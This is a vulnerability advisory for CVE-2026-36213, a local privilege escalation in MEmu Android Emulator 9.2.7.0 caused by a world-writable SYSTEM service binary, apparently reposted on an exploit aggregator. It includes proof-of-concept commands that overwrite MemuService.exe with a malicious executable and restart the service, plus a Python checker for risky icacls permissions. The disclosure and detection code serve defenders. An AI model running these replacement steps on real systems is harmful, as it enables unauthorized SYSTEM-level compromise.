## https://sploitus.com/exploit?id=PACKETSTORM:223278
# CVE-2026-36213
    CVE-2026-36213 | Local Privilege Escalation in MEmu Android Emulator 9.2.7.0 via Insecure Service Binary Permissions | Patched in 9.3.2
    # CVE-2026-36213 — MEmu Android Emulator 9.2.7.0 LPE
    
    ![CVE](https://img.shields.io/badge/CVE-2026--36213-red)
    ![CVSS](https://img.shields.io/badge/CVSS-7.8%20HIGH-orange)
    ![Status](https://img.shields.io/badge/Patched-9.3.2-green)
    ![Platform](https://img.shields.io/badge/Platform-Windows-blue)
    
    ## Summary
    
    A Local Privilege Escalation (LPE) vulnerability in **MEmu Android Emulator 9.2.7.0**.  
    The service `MEmuSVC` runs as `NT AUTHORITY\SYSTEM` while its binary is writable by any local user, allowing full system compromise.
    
    | Field | Details |
    |-------|---------|
    | **CVE** | CVE-2026-36213 |
    | **Product** | MEmu Android Emulator (MicroVirt) |
    | **Affected Version** | 9.2.7.0 and earlier |
    | **Fixed Version** | 9.3.2 |
    | **CWE** | CWE-732 / CWE-269 |
    | **CVSS v3.1** | 7.8 HIGH `AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` |
    | **ATT&CK** | [T1574.010](https://attack.mitre.org/techniques/T1574/010/) |
    
    ---
    
    ## Vulnerability
    
    `MEmuService.exe` is installed as a SYSTEM-level Windows service with insecure NTFS permissions:
    
    ```cmd
    icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"
    
    BUILTIN\Users:(F)   ← Any local user has Full Control
    Everyone:(F)        ← World-writable binary
    ```
    
    ## Proof of Concept
    
    :: Step 1 - Verify vulnerable permissions
    ```cmd
    icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"
    ```
    
    :: Step 2 - Replace binary (as low-priv user)
    ```cmd
    copy malicious.exe "C:\Program Files\Microvirt\MEmu\MemuService.exe" /Y
    ```
    
    :: Step 3 - Restart service
    ```cmd
    sc stop MEmuSVC && sc start MEmuSVC
    ```
    
    :: Result: malicious.exe runs as NT AUTHORITY\SYSTEM
    
    ## Detection Script
    Available at: https://github.com/sec-zone/Hijack-service-binaries
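
One way to triage `icacls` output like that shown in the Vulnerability section, added here as an example (it is not the linked detection script or the researcher's code): the parser flags allow-ACEs that give low-privileged groups write-class rights on the service binary. The sample ACLs, the `LOW_PRIV` group list and the function names are constructed for illustration.

```python
import re

PATH = r"C:\Program Files\Microvirt\MEmu\MemuService.exe"  # path as shown on the page
# Well-known groups that every unprivileged local account falls into.
LOW_PRIV = {"everyone", "builtin\\users", "nt authority\\authenticated users",
            "nt authority\\interactive"}
# icacls propagation flags: they say how an ACE is inherited, not what it grants.
FLAGS = {"I", "OI", "CI", "IO", "NP"}
# icacls rights that allow overwriting the file or rewriting its DACL/owner.
WRITE = {"F", "M", "W", "WD", "AD", "WDAC", "WO", "GW", "GA"}
ACE_RE = re.compile(r"^([^:]+):((?:\([^)]*\))+)$")

def parse_aces(text, path=PATH):
    """Yield (principal, is_deny, rights) for each ACE line of icacls output."""
    for line in text.splitlines():
        line = line.strip()
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()  # first ACE shares a line with the path
        m = ACE_RE.match(line)
        if not m:
            continue  # blank lines and the "Successfully processed" summary
        groups = re.findall(r"\(([^)]*)\)", m.group(2))
        rights = {r.strip() for g in groups if g not in FLAGS | {"DENY"}
                  for r in g.split(",")}
        yield m.group(1).strip(), "DENY" in groups, rights

def risky_aces(text, path=PATH):
    """Allow-ACEs that let a low-privileged principal replace the binary."""
    return [(who, sorted(rights & WRITE))
            for who, deny, rights in parse_aces(text, path)
            if not deny and who.lower() in LOW_PRIV and rights & WRITE]

# Constructed sample: the two ACEs reported on the page plus typical admin entries.
SAMPLE_VULN = r"""C:\Program Files\Microvirt\MEmu\MemuService.exe BUILTIN\Users:(F)
                                                   Everyone:(F)
                                                   NT AUTHORITY\SYSTEM:(I)(F)
                                                   BUILTIN\Administrators:(I)(F)

Successfully processed 1 files; Failed processing 0 files"""
# Constructed sample: a read/execute-only ACL for users (assumed, not taken from 9.3.2).
SAMPLE_LOCKED = r"""C:\Program Files\Microvirt\MEmu\MemuService.exe NT AUTHORITY\SYSTEM:(I)(F)
    BUILTIN\Administrators:(I)(F)
    BUILTIN\Users:(I)(RX)
    BUILTIN\Users:(DENY)(W)"""

if __name__ == "__main__":
    for name, sample in (("vulnerable", SAMPLE_VULN), ("locked", SAMPLE_LOCKED)):
        print(name, risky_aces(sample))
```

Any non-empty result for a binary that a service runs as `NT AUTHORITY\SYSTEM` is the condition this advisory describes.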
    
    ## Disclaimer
    This research was conducted for educational purposes under a responsible disclosure policy.  
    The author is not responsible for any misuse of this information.
    
    ## Researcher
    Name: Mohammad Hossein Ashofte Yazdi  
    LinkedIn: https://www.linkedin.com/in/seczone64  
    Twitter: @sec_zone64  
    Email: sec.zone64@gmail.com